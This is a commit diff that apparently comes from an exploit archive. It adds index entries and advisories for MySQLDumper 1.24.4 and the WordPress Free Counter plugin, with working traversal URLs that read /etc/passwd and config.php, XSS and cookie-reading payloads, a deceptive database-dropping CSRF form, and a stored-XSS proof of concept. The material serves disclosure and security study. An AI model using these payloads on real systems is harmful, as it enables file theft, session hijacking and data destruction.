DB: 2015-05-28

9 new exploits
This commit is contained in:
Offensive Security 2015-05-28 05:02:44 +00:00
parent 8a28155962
commit c2a15a0750
11 changed files with 184 additions and 6 deletions

View file

@ -78,7 +78,7 @@ id,file,description,date,author,platform,type,port
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
@ -13780,7 +13780,7 @@ id,file,description,date,author,platform,type,port
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0
15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0
15879,platforms/windows/shellcode/15879.txt,"w32 speaking shellcode",2010-12-31,Skylined,windows,shellcode,0
15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0
15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
@ -26885,7 +26885,7 @@ id,file,description,date,author,platform,type,port
30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
30165,platforms/asp/webapps/30165.txt,Ibrahim,2007-06-08,ertuqrul,asp,webapps,0
30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
@ -33504,3 +33504,12 @@ id,file,description,date,author,platform,type,port
37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0
37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0
37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0
37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0
37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00

15
platforms/php/webapps/37125.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E

15
platforms/php/webapps/37127.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation

16
platforms/php/webapps/37128.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1

16
platforms/php/webapps/37129.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00

17
platforms/php/webapps/37130.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/restore.php
http://www.example.com/learn/cubemail/dump.php
http://www.example.com/learn/cubemail/refresh_dblist.php

19
platforms/php/webapps/37131.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>

41
platforms/php/webapps/37132.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
# Date: 2015/05/25
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://www.free-counter.org
# Software Link: https://wordpress.org/plugins/free-counter/
# Version: 1.1
# Tested on: WordPress 4.2.2
# Category: webapps
# CVE: CVE-2015-4084
1. Description
Any authenticated or non-authenticated user can perform a stored XSS
attack simply by exploiting wp_ajax_nopriv_check_stat action.
Plugin uses a widget to display website's visits, so any page that
contains this widget will also load the malicious JS code.
2. Proof of Concept
* Send a post request to `http://www.free-counter.org/Api.php` in order
to reveal the counter id of the vulnerable site. The POST data must
contain the following vars:
`action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
* As a response we get a serialized indexed array. The value that we
need to know is the 'counter_id'.
* Send a post request to
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
`action=check_stat&id_counter=<counter_id from step
2>&value_=<script>alert(1)</script>`
* Visit a page of the infected website that displays plugin's widget.
Note that the plugin uses the update_option function to store the
$_POST['value_'] contents to DB so any code inserted there will be
escaped. Even though a malicious user can omit the quotes in the src
attr of the script tag. Most modern browsers will treat the tag as they
were there.
3. Solution
No official solution yet exists.

15
platforms/php/webapps/37133.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/53306/info
MySQLDumper is prone to multiple security vulnerabilities, including:
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected.
http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;

View file

@ -194,6 +194,6 @@ snd=send(sock, exploit_code, strlen(exploit_code) , 0);
Sleep(2000);
closesocket(sock);
return 0;
}
// milw0rm.com [2003-08-13]
}
// milw0rm.com [2003-08-13]